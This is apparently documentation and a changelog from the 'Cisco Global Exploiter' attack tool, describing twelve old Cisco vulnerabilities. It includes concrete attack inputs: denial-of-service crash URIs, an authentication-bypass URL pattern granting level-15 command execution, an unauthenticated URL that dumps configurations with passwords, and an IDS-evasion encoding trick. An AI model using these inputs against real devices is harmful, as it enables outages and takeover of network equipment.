user-friendly 364 | Web interface. A flaw in the HTTP server permits an attacker with access to the HTTP service 365 | port to crash the device and force a software re-load. The service is enabled by default only 366 | on Cisco 1003, 1004 and 1005 routers. 367 | 368 | Virtually all Cisco routers and switches running IOS versions 12.0 through 12.1 inclusive 369 | are vulnerable. 370 | The following is list of products that are affected if they are running a release of Cisco 371 | IOS software that has the defect : 372 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 2500, 2600, 3000, 3600, 373 | 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, and 12000 374 | series. 375 | 376 | By sending an HTTP request with the following URI: 377 | 378 | http://target/anytext?/ 379 | 380 | The switch crashes and performs a software re-load, network connectivity is disrupted while 381 | this is done. 382 | Sending these HTTP requests repetitively can perform a Denial of Service attack against the 383 | switch and the entire network connected to it. -------------------------------------------------------------------------------- /doc/Changelog: -------------------------------------------------------------------------------- 1 | 2 | Cisco Global Exploiter [ 13 Vulnerabilities ] - Released: 08/04/2004 3 | 4 | + Fixed a bug of Cisco IOS HTTP Auth Vulnerability exploit 5 | + Added CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 6 | + Added Cisco Catalyst Memory Leak Vulnerability 7 | + Added Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 8 | + Added %u Encoding IDS Bypass Vulnerability (UTF) 9 | + Added Cisco IOS HTTP Denial of Service Vulnerability 10 | + Added complete vulnerabilities documentation 11 | 12 | 13 | 14 | Cisco Global Exploiter [ 8 Vulnerabilities ] - Released: 20/03/2003 15 | 16 | + Cisco 677/678 Telnet Buffer Overflow Vulnerability 17 | + Cisco IOS Router Denial of Service Vulnerability 18 | + Cisco IOS HTTP Auth Vulnerability 19 | + Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 20 | + Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 21 | + Cisco 675 Web Administration Denial of Service Vulnerability 22 | + Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 23 | + Cisco IOS Software HTTP Request Denial of Service Vulnerability 24 | 25 | -------------------------------------------------------------------------------- /doc/Documentation: -------------------------------------------------------------------------------- 1 | 2 | ## 3 | # Cisco Global Exploiter Documentation 4 | # Vulnerabilities description and exploiting impact 5 | # 6 | # Legal notes : 7 | # The BlackAngels staff refuse all responsabilities 8 | # for an incorrect or illegal use of this document 9 | # or for eventual damages to others systems. 10 | # 11 | # http://www.blackangels.it 12 | ## 13 | 14 | 15 | 16 | [ Table of contents ] 17 | 18 | 1 - Cisco 677/678 Telnet Buffer Overflow Vulnerability 19 | 2 - Cisco IOS Router Denial of Service Vulnerability 20 | 3 - Cisco IOS HTTP Auth Vulnerability & 21 | Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 22 | 4 - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 23 | 5 - Cisco 675 Web Administration Denial of Service Vulnerability 24 | 6 - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 25 | 7 - Cisco IOS Software HTTP Request Denial of Service Vulnerability 26 | 8 - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 27 | 9 - Cisco Catalyst Memory Leak Vulnerability 28 | 10 - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 29 | 11 - %u Encoding IDS Bypass Vulnerability (UTF) 30 | 12 - Cisco IOS HTTP Denial of Service Vulnerability 31 | 32 | 33 | 34 | [1] Cisco 677/678 Telnet Buffer Overflow Vulnerability 35 | ====================================================== 36 | 37 | This vulnerability is identified in Cisco Broadband Operating System (CBOS), 38 | an operating system for the Cisco 600 family of routers. 39 | Each vulnerability can cause a Denial of Service by freezing the administrator 40 | premises equipment (CPE). 41 | Vulnerability can be exploited remotely. 42 | 43 | All Cisco DSL CPE devices from the 600 family running CBOS software up to 44 | and including 2.4.4 release are vulnerable. 45 | The complete list of vulnerable hardware models is : 46 | 626, 627, 633, 673, 675, 675e, 676, 677, 677i and 678. 47 | 48 | By sending a large packet to the Telnet port it is possible to freeze the CPE. 49 | It is not necessary to be logged in or to authenticate in any way. 50 | Telnet is enabled by default. 51 | 52 | By repeatedly exploiting these vulnerabilities an attacker can cause a Denial 53 | of Service for an indeterminate period of time. 54 | 55 | 56 | [2] Cisco IOS Router Denial of Service Vulnerability 57 | ==================================================== 58 | 59 | A defect in multiple releases of Cisco IOS software will cause a Cisco router 60 | or switch to halt and reload if the IOS HTTP service is enabled and browsing 61 | to "http:///%%" is attempted. 62 | This defect can be exploited to produce a Denial of Service attack. 63 | 64 | The vulnerability, affects virtually all mainstream Cisco routers and switches 65 | running Cisco IOS software releases 11.1 through 12.1, inclusive. 66 | The vulnerability can be mitigated by disabling the IOS HTTP server, using an 67 | access-list on an interface in the path to the router to prevent unauthorized 68 | network connections to the HTTP server, or applying an access-class option directly 69 | to the HTTP server itself. 70 | The IOS HTTP server is enabled by default only on Cisco 1003, 1004, and 1005 71 | routers that are not configured. 72 | In all other cases, the IOS HTTP server must be explicitly enabled in order 73 | to exploit this defect. 74 | Cisco devices that may be running affected releases include : 75 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 2500, 2600, 76 | 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, 77 | ubr7200, 7500, 12000 series, LS1010 ATM switch, Catalyst 6000, 2900XL, 3500XL 78 | LAN switches and Cisco DistributedDirector. 79 | 80 | Any affected Cisco IOS device that is operating with the HTTP server enabled 81 | and is not protected against unauthorized connections can be forced to halt 82 | for a period of up to two minutes and then reload. 83 | 84 | The vulnerability can be exercised repeatedly, possibly creating a Denial 85 | of Service attack, until such time as the HTTP server is disabled, the router 86 | is protected against the attack, or the software on the router is upgraded to 87 | an unaffected release of IOS. 88 | In rare instances when a router at a remote location fails to reload, an 89 | administrator must visit the physical device to recover from the defect. 90 | 91 | 92 | [3] Cisco IOS HTTP Auth Vulnerability & Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 93 | ================================================================================================================== 94 | 95 | When the HTTP server is enabled and local authorization is used, it is possible, 96 | under some circumstances, to bypass the authentication and execute any command 97 | on the device. 98 | In that case, the user will be able to exercise complete control over the device. 99 | All commands will be executed with the highest privilege (level 15). 100 | 101 | All releases of Cisco IOS software, starting with release 11.3 and later, are 102 | vulnerable. 103 | Virtually all mainstream Cisco routers and switches running Cisco IOS software 104 | are affected by this vulnerability. 105 | Products that are not running Cisco IOS software are not vulnerable. 106 | Any device running Cisco IOS software release 11.3 and later is vulnerable. 107 | Cisco devices that may be running with affected Cisco IOS software releases 108 | include but are not limited to : 109 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 110 | 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, 111 | AS5800, 6400, 7000, 7100, 7200, ubr7200, 7500, 12000 series, LS1010 ATM switch, 112 | Catalyst 6000, 5000, 2900XL, 3500XL, LAN switch and Cisco Distributed Director. 113 | 114 | By sending a crafted URL it is possible to bypass authentication and execute any 115 | command on the router at level 15 (enable level, the most privileged level). 116 | This will happen only if the user is using a local database for authentication 117 | (usernames and passwords are defined on the device itself). 118 | The same URL will not be effective against every Cisco IOS software release and 119 | hardware combination. However, there are only 84 different combinations to try, 120 | so it would be easy for an attacker to test them all in a short period of time. 121 | The URL in question follows this format : 122 | 123 | http:///level/n/exec/.... 124 | 125 | where n is a number between 16 and 99. 126 | 127 | An attacker can exercise complete control over the device. 128 | By exploiting this vulnerability, the attacker can see and change the 129 | configuration of the device. 130 | 131 | 132 | [4] Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 133 | ======================================================================== 134 | 135 | Non-Secure Shell (SSH) connection attempts to an enabled SSH service on a Cisco 136 | Catalyst 6000, 5000, or 4000 switch might cause a "protocol mismatch" error, 137 | resulting in a supervisor engine failure. 138 | The supervisor engine failure causes the switch to fail to pass traffic and 139 | reboots the switch. 140 | 141 | Only the following images are affected : 142 | cat4000-k9.6-1-1.bin, cat5000-sup3cvk9.6-1-1a.bin, cat5000-sup3k9.6-1-1.bin, 143 | cat5000-supgk9.6-1-1.bin, cat6000-sup2cvk9.6-1-1a.bin, cat6000-sup2k9.6-1-1a.bin, 144 | cat6000-supcvk9.6-1-1a.bin, cat6000-supk9.6-1-1a.bin, cat6000-sup2cvk9.6-1-1b.bin, 145 | cat6000-sup2k9.6-1-1b.bin, cat6000-supcvk9.6-1-1b.bin and cat6000-supk9.6-1-1b.bin. 146 | 147 | Non SSH protocol connection attempts to the SSH service cause a "protocol mismatch" 148 | error, which causes a switch to reload. 149 | SSH is not enabled by default, and must be configured by the administrator. 150 | 151 | This vulnerability enables a Denial of Service attack on the Catalyst switch. 152 | 153 | 154 | [5] Cisco 675 Web Administration Denial of Service Vulnerability 155 | ================================================================ 156 | 157 | Any router in the Cisco 600 family that is configured to allow Web access can 158 | be locked by sending a specific URL. 159 | Web access is disabled by default, and it is usually enabled in order to 160 | facilitate remote configuration. 161 | 162 | The affected models are : 163 | 627, 633, 673, 675, 675E, 677, 677i and 678. 164 | These models are vulnerable if they run any of the following, or earlier, 165 | CBOS releases: 166 | 2.0.1, 2.1.0, 2.1.0a, 2.2.0, 2.2.1, 2.2.1a, 2.3, 2.3.2, 2.3.5, 2.3.7 and 2.3.8. 167 | 168 | The behavior is caused by inadequate URL parsing in CBOS. 169 | Each URL was expected to terminate with a minimum of a single space character 170 | (ASCII code 32, decimal). 171 | Sending a URL that does not terminate with a space causes CBOS to enter an 172 | infinite loop. 173 | It is necessary to power cycle the router to resume operation. 174 | To exploit this vulnerability, a router must be configured to accept Web connections. 175 | Having a Web access password configured does not provide protection against this 176 | vulnerability. 177 | 178 | By sending a tailored URL to a router, it is possible to cause a Denial of Service. 179 | Every affected router must be powered off and back on in order to restore its normal 180 | functionality. 181 | 182 | 183 | [6] Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 184 | ================================================================= 185 | 186 | The Catalyst 3500 XL series switches web configuration interface letsany user 187 | execute any command on the system without logging in. 188 | 189 | Affected systems are : 190 | Cisco Catalyst 3500 XL series switches and all switches that uses similiar 191 | softwares. 192 | 193 | Cisco Catalyst 3500 XL series switches have a webserver configuration interface. 194 | This interface lets any anonymous web user execute any command without supplying 195 | any authentication credentials by simply requesting the "/exec" location from the 196 | webserver. 197 | An example follows : 198 | 199 | http://target/exec/show/config/cr 200 | 201 | This URL will show the configuration file, with all user passwords. 202 | 203 | 204 | [7] Cisco IOS Software HTTP Request Denial of Service Vulnerability 205 | =================================================================== 206 | 207 | A defect in multiple releases of Cisco IOS software will cause a Cisco router or 208 | switch to halt and reload if the IOS HTTP service is enabled, browsing to 209 | "http://target/anytext?/" is attempted, and the enable password is supplied 210 | when requested. 211 | This defect can be exploited to produce a Denial of Service attack. 212 | 213 | Cisco devices that may be running with affected IOS software releases include : 214 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 215 | 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 216 | 6400, 7000, 7200, ubr7200, 7500, 12000 series, LS1010 ATM switch, Catalyst 6000, 217 | 2900XL, LAN switch 1900, 2800, 2900, 3000, and 5000 and Cisco Distributed Director. 218 | 219 | The HTTP server was introduced in IOS release 11.0 to extend router management to 220 | the worldwide Web. 221 | The "?" (question mark) character is defined in the HTML specifications as a 222 | delimiter for CGI arguments. 223 | It is also interpreted by the IOS command-line interface as a request for help. 224 | As of Cisco IOS Software Release 12.0T, the meaning of a question mark when it 225 | appears adjacent to a "/" (slash) character cannot be determined properly by the 226 | URI parser in affected versions of Cisco IOS software. 227 | When a URI containing "?/" is presented to the HTTP service on the router and a 228 | valid enable password is supplied, the router enters an infinite loop. 229 | A watchdog timer expires two minutes later and forces the router to crash and reload. 230 | The router continues to be vulnerable to this defect as long as it is running an 231 | affected IOS software release and the enable password is known. 232 | This vulnerability may only be exploited if the enable password is not set, it is 233 | well known, or it can be guessed. 234 | In rare cases, an affected device fails to reload, which means an administrator must 235 | physically cycle the power to resume operation. 236 | The HTTP server is not enabled by default except on unconfigured Cisco model 1003, 237 | 1004 and 1005 routers. 238 | Once initial access is granted to configure the router, the administrator may set an 239 | enable password, and disable or limit access to the HTTP server by changing the 240 | configuration. 241 | Once the new configuration has been saved, the HTTP server will not be enabled when 242 | the router restarts. 243 | 244 | An affected Cisco IOS device that is operating with the HTTP service enabled and is 245 | not protected by having the enable password configured can be forced to halt for up 246 | to two minutes and then reload. 247 | The vulnerability can be exercised repeatedly, possibly creating a Denial of Service 248 | attack, unless the service is disabled, the enable password is set, or the router is 249 | upgraded to a fixed release. 250 | In instances in which a router at a remote location fails to reload, an administrator 251 | must visit the site to enable the device to recover from the defect. 252 | 253 | 254 | [8] CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 255 | ========================================================================= 256 | 257 | Cisco Secure Access Control Server (ACS) for Windows contains two vulnerabilities. 258 | One vulnerability can lead to the execution of an arbitrary code on an ACS server, 259 | and the second can lead to an unauthorized disclosure of information. 260 | 261 | The affected product is : 262 | Cisco Secure Access Control Server for Windows 2.6.x and ACS 3.0.1. 263 | 264 | By connecting to port 2002 and sending a crafted URL, it is possible to, in a less 265 | severe case, kill the CSADMIN module or, in a sever case, to execute an arbitrary 266 | user-supplied code. 267 | The functionality of authentication, authorization, and accounting (AAA) is not 268 | affected by termination of the CSADMIN module. This means that users will be able to 269 | authenticate normally. 270 | Only the administration function will be affected. Port 2002 is used by the CSADMIN 271 | module for remote administration. 272 | By providing a URL containing formatting symbols (for example, %s, %p), it is possible 273 | to execute a user-provided code. 274 | 275 | By exploiting the format vulnerability, an attacker may execute arbitrary code on the 276 | machine. 277 | This code will be executed in the same context as the CSADMIN process, and that is as 278 | administrator. 279 | Executing arbitrary code will lead to a total compromise of the machine. 280 | By exploiting the directory traversal vulnerability, an attacker can gain unauthorized 281 | access to information in the following file types: html, htm, class, jpg, jpeg or gif. 282 | The main issue may be html files with hardcoded passwords or other sensitive information. 283 | 284 | 285 | [9] Cisco Catalyst Memory Leak Vulnerability 286 | ============================================ 287 | 288 | A series of failed telnet authentication attempts to the switch can cause the Catalyst 289 | Switch to fail to pass traffic or accept management connections until the system is 290 | rebooted or a power cycle is performed. 291 | All types of telnet authentication are affected, including Kerberized telnet, and 292 | AAA authentication. 293 | 294 | Affected systems are : 295 | Catalyst 4000 and 5000 images running version 4.5(2) up to 5.5(4) and 5.5(4a) and 296 | Catalyst 6000 images running version 5.3(1)CSX, up to and including 5.5(4) and 5.5(4a). 297 | The Catalyst 4000 series is installed on the Catalyst 2948G, 2980G, 4003, 4006, and 298 | 4912G switches. 299 | The Catalyst 6000 series is installed on the Catalyst 6009, 6006, 6509, 6509-NEB, and 300 | 6506 modular chassis switches. 301 | 302 | The telnet process fails to release resources upon a failed authentication, or a 303 | successful login of extremely short duration such as a telnet from within an automated 304 | script. 305 | This memory leak eventually results in the failure of the switch to perform any other 306 | processes, such as forwarding traffic or management; a power cycle or reboot is required 307 | for recovery. 308 | The command "show process memory" will indicate increased "Holding" memory after failed 309 | telnet authentication attempts. This value will not decrease over time except when a reboot, 310 | reload, or power cycle occurs. This bug may be triggered over a period of time in the 311 | course of normal operation by legitimate users that occasionally fail authentication. 312 | 313 | This vulnerability enables a Denial of Service attack on the Catalyst switch. 314 | 315 | 316 | [10] Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 317 | ==================================================================== 318 | 319 | Certain versions of Cisco CatOS ship with an embedded HTTP server. 320 | Switches that run these versions of CatOS are prone to a denial of service, which is due to 321 | a remote buffer overflow condition in the HTTP server. 322 | This issue is reported to affect CatOS versions 5.4 through 7.4 which contain "cv" in the 323 | image name. 324 | 325 | Affected systems are : 326 | Cisco CatOS 5.4, 5.5(13a), 5.5, 6.1(2), 6.1, 7.3 and 7.4. 327 | 328 | This vulnerability could be exploited by performing a special "GET" request, with a really 329 | big argument; a shellcode could also be used, to get a shell on the remote system or to 330 | execute arbitrary commands. 331 | 332 | 333 | [11] %u Encoding IDS Bypass Vulnerability (UTF) 334 | =============================================== 335 | 336 | Intrusion Detection Systems inspect network traffic for suspect or malicious packet formats, 337 | data payloads and traffic patterns. 338 | Intrusion detection systems typically implement obfuscation defense - ensuring that suspect 339 | packets cannot easily be disguised with UTF and/or hex encoding and bypass the Intrusion 340 | Detection systems. 341 | 342 | The following products are affected : 343 | Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor component and 344 | Cisco Catalyst 6000 Intrusion Detection System Module. 345 | 346 | The %u encoding method is a different encoding method that is understood and parsed by the 347 | IIS web server. 348 | This encoding can be applied to other portions of the url to effectively obfuscate the 349 | attack, preventing detection by many intrusion detection systems available. 350 | Cisco Secure Intrusion Detection System Sensor decoding algorithms have been modified to 351 | detect and parse this unicode form. 352 | 353 | 354 | This method of obfuscation can allow malicious exploitation to bypass current intrusion 355 | detection technology. 356 | 357 | 358 | [12] Cisco IOS HTTP Denial of Service Vulnerability 359 | =================================================== 360 | 361 | The HTTP service facility in the Cisco IOS provides remote management capabilities using 362 | any web browser as client. 363 | It is commonly used to manage remote routers and switches with a simple and user-friendly 364 | Web interface. A flaw in the HTTP server permits an attacker with access to the HTTP service 365 | port to crash the device and force a software re-load. The service is enabled by default only 366 | on Cisco 1003, 1004 and 1005 routers. 367 | 368 | Virtually all Cisco routers and switches running IOS versions 12.0 through 12.1 inclusive 369 | are vulnerable. 370 | The following is list of products that are affected if they are running a release of Cisco 371 | IOS software that has the defect : 372 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 2500, 2600, 3000, 3600, 373 | 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, and 12000 374 | series. 375 | 376 | By sending an HTTP request with the following URI: 377 | 378 | http://target/anytext?/ 379 | 380 | The switch crashes and performs a software re-load, network connectivity is disrupted while 381 | this is done. 382 | Sending these HTTP requests repetitively can perform a Denial of Service attack against the 383 | switch and the entire network connected to it. --------------------------------------------------------------------------------